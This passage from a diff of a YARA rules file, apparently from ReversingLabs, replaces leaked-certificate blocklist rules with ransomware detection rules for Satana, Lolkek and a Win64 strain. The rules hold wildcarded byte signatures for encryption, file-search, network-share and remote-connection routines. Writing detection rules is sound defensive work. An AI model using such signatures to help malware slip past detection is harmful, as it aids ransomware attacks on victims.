+            C0 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C
+            8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 84 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B
+        }
+		$encrypt_network_shares_win64_p2 = {
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ??
+            ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ??
+            ?? 48 C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? 48 FF C0 48 89 44 24 ?? 48 8D 8C
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 39 44 24 ?? 73 ?? 48 83 7C 24 ?? ?? 76 ?? 33 D2
+            48 8B 44 24 ?? B9 ?? ?? ?? ?? 48 F7 F1 48 8B C2 48 85 C0 75 ?? 41 B9 ?? ?? ?? ?? 4C
+        }
+		$encrypt_network_shares_win64_p3 = {
+            8D 05 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44
+            24 ?? 48 FF C0 48 89 44 24 ?? EB ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ??
+            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
+            E8 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B
+            C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 C6 44 24 ?? ?? 48 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 32 C0 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? C3
+        }
+		$find_files_win64 = {
+            48 89 5C 24 ?? 55 56 57 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33
+            C4 48 89 84 24 ?? ?? ?? ?? 4D 8B F0 49 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B E9 48 3B D1
+            74 ?? 0F B7 02 66 83 E8 ?? 66 83 F8 ?? 77 ?? 0F B7 C0 49 0F A3 C0 72 ?? 48 83 EA ??
+            48 3B D5 75 ?? 0F B7 0A 66 83 F9 ?? 75 ?? 48 8D 45 ?? 48 3B D0 74 ?? 4D 8B CE 45 33
+            C0 33 D2 48 8B CD E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 83 E9 ?? 33 FF 66 83 F9 ?? 77 ??
+            0F B7 C1 49 0F A3 C0 B0 ?? 72 ?? 40 8A C7 48 2B D5 48 8D 4C 24 ?? 48 D1 FA 41 B8 ??
+            ?? ?? ?? 48 FF C2 F6 D8 4D 1B FF 4C 23 FA 33 D2 E8 ?? ?? ?? ?? 45 33 C9 89 7C 24 ??
+            4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CD FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ??
+            75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CD E8 ?? ?? ?? ?? 8B F8 48 83 FB ?? 74 ?? 48 8B
+            CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C
+            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F 5E 5D C3 49 8B 76 ?? 49 2B 36 48
+            C1 FE ?? 66 83 7C 24 ?? ?? 75 ?? 66 39 7C 24 ?? 74 ?? 66 83 7C 24 ?? ?? 75 ?? 66 39
+            7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D5 E8 ?? ?? ?? ?? 85 C0 75 ??
+            48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06 49 8B 56 ?? 48 2B D0
+            48 C1 FA ?? 48 3B F2 0F 84 ?? ?? ?? ?? 48 2B D6 48 8D 0C F0 4C 8D 0D ?? ?? ?? ?? 41
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Intermediate PCA" and pe.signatures [ i ] . serial == "3a:ab:11:de:e5:2f:1b:19:d0:56" )
+		uint16( 0 ) == 0x5A4D and ( $find_files_win64 ) and ( all of ( $encrypt_files_win64_p* ) ) and ( all of ( $encrypt_network_shares_win64_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_6102B01900000000002F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Satana : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Satana ransomware."
 		author = "ReversingLabs"
-		id = "b98769c6-805e-5cd0-96f1-67418fec40a6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8dc5bf7c-d4cb-5961-804b-035676dacbc0"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1091-L1106"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Satana.yara#L1-L123"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6c42daa8b8730541bb422ac860ec4b0830e00fdb732e4bb503054dbcae1ff6d4"
+		logic_hash = "5deb6ac2e8b64fb6f7af8c41a9b9e695668ca66c96c65f0c7350b11cd4ae0c50"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Satana"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ??
+            ?? 83 EC ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 89 65 ?? C7 45 ?? ?? ?? ?? ?? 66
+            0F 57 C0 66 0F 13 45 ?? 68 ?? ?? ?? ?? 8B 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 90
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B F8 89
+            7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 89 75 ??
+            8B 5D ?? 89 5D ?? 83 FE ?? 75 ?? 85 DB 0F 84 ?? ?? ?? ?? 8B CE 0B CB 0F 84 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 53 56 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 33 C9
+            03 C6 13 CB 83 E8 ?? 89 45 ?? 83 D9 ?? 89 4D ?? 6A ?? 8B 55 ?? 52 6A ?? 6A ?? 6A ??
+            57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 6A ?? FF 15 ??
+            ?? ?? ?? 83 C4 ?? 8B F0 66 0F 57 C0 66 0F 13 45 ?? 8B 5D ?? 8B 7D ?? 90 83 7D ?? ??
+            0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B D3 83 C2 ?? 8B 75 ?? 8B CE
+            83 D1 ?? 8B 45 ?? 3B C8 7F ?? 7C ?? 3B 55 ?? 77 ?? BF ?? ?? ?? ?? 33 C0 8B 75 ?? 03
+        }
+		$encrypt_files_p2 = {
+            F3 8B DA 89 4D ?? EB ?? 8B 7D ?? 2B FB 1B C6 8B 55 ?? 8D 34 13 03 DF 11 45 ?? 89 5D
+            ?? 89 45 ?? 89 7D ?? 83 7D ?? ?? 7F ?? 7C ?? 83 7D ?? ?? 73 ?? 8B 4D ?? 89 4D ?? 83
+            F9 ?? 7D ?? C6 04 31 ?? 41 EB ?? 29 7D ?? 19 45 ?? 33 C0 89 45 ?? 83 F8 ?? 7D ?? 8B
+            0C 85 ?? ?? ?? ?? 31 0C 86 40 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 74
+            ?? 88 04 37 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 01
+            0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 0D ?? ?? ?? ?? 51 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? EB ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 FF
+            15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? FF 15 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B
+            4D ?? 8D 95 ?? ?? ?? ?? 0F B7 01 66 89 02 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 6A ?? 8D
+            95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 74 ?? 8B D0 8D B5 ?? ?? ?? ??
+            0F B7 0A 66 89 0E 83 C2 ?? 83 C6 ?? 66 85 C9 75 ?? 33 C9 66 89 08 8D 95 ?? ?? ?? ??
+            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ??
+            ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF
+            15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? EB ?? B8 ?? ?? ?? ?? C3 8B 65 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+        }
+		$search_files_p1 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 33 D2 56 50 66 89 94 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 56 52
+            66 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 56 50 89
+            74 24 ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 68
+            ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8D 94 24 ?? ?? ?? ?? 8B C7 2B D7 8D 9B ?? ?? ?? ?? 0F B7 08 66 89 0C 02 83 C0
+            ?? 66 3B CE 75 ?? 8D 84 24 ?? ?? ?? ?? 83 C0 ?? 8D A4 24 ?? ?? ?? ?? 66 8B 48 ?? 83
+            C0 ?? 66 3B CE 75 ?? 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 08 66 8B 0D ?? ?? ?? ??
+            89 50 ?? 68 ?? ?? ?? ?? 66 89 48 ?? FF 15 ?? ?? ?? ?? 8D 54 24 ?? 52 8D 84 24 ?? ??
+            ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 75 ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5
+            5D C2 ?? ?? 8D A4 24 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 68 ??
+            ?? ?? ?? 51 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? 68 ?? ?? ?? ??
+            52 FF D6 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 8D 44 24
+            ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 84 ?? ?? ?? ?? 66 83 3D ?? ??
+            ?? ?? ?? BF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C7 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66
+            8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 8B CB D1 F8 8D 71 ?? 66 8B 11 83 C1 ?? 66 85 D2
+        }
+		$search_files_p2 = {
+            75 ?? 2B CE D1 F9 3B C1 75 ?? 53 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 66 8B 0F
+            83 C7 ?? 66 85 C9 75 ?? 66 39 0F 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 64 8B 15 ?? ?? ?? ?? 8B 32 8B 55 ?? 83 C4 ?? 8D 4C 24 ?? 51 52 68 ?? ?? ?? ?? 50
+            89 46 ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 F8 ?? 7D ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
+            8B 4E ?? 6A ?? 6A ?? 51 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? 89 04 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 0C 85 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF
+            D3 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8B 56 ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 6A ?? 6A ?? FF D3 8B 0D ?? ?? ?? ?? 89
+            04 8D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8D 4C 24 ?? 51 57 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 48 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D6 83 C4 ?? 85
+            C0 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8D 9B ?? ?? ?? ?? 0F B7 8C 04 ?? ?? ?? ?? 66 89 8C 04 ?? ?? ?? ?? 83
+            C0 ?? 66 85 C9 75 ?? 8D BC 24 ?? ?? ?? ?? 83 C7 ?? 66 8B 47 ?? 83 C7 ?? 66 85 C0 75
+            ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? F3 A5
+            FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 52
+            50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 74 24 ?? 56 FF 15
+      }
+		$remote_connection = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 E8 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 0F B6 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 3D ??
+            ?? ?? ?? 8D 70 ?? 8B 00 56 68 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 52 0F B7 15 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 52 8B 15 ?? ?? ?? ?? 51 52 50
+            6A ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF D7 83 C4 ?? 80 3E ?? 74 ?? B9 ?? ?? ??
+            ?? 8B C6 EB ?? 8D 49 ?? C6 00 ?? 40 49 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 8D 8D ?? ?? ?? ?? 51 2B C2
+            50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 FF D7 8D 85 ??
+            ?? ?? ?? 83 C4 ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 2B C2 50 8D 85 ?? ?? ?? ?? 50
+            53 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ?? C6 00 ?? 40
+            49 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2
+      }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Microsoft Enforced Licensing Registration Authority CA (SHA1)" and pe.signatures [ i ] . serial == "61:02:b0:19:00:00:00:00:00:2f" )
+		uint16( 0 ) == 0x5A4D and ( $remote_connection and ( all of ( $search_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_01E2B4F759811C64379Fca0Be76D2Dce : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Lolkek : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Lolkek ransomware."
 		author = "ReversingLabs"
-		id = "00effc8a-066c-54ff-891e-c635d161b171"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "441badd6-3708-5f74-90f3-4d3a0fc45aff"
+		date = "2020-10-23"
+		modified = "2020-10-23"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1108-L1124"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Lolkek.yara#L1-L106"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0dff7a9f2e152c20427ea231449b942a040e964cb7dad90271d2865290535326"
+		logic_hash = "d18545b25a33bba1a6e01ab37768bd4f15fb125dcb8cbe7909d9a8bbe08e63fa"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Lolkek"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99
+            F7 F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF D3 83
+            C4 ?? 56 57 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ??
+            6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99 F7
+            F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 85 FF 0F 85 ?? ?? ?? ?? 5E 5B 33 C0 5F C2
+        }
+		$find_volumes_p1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56
+            57 E8 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
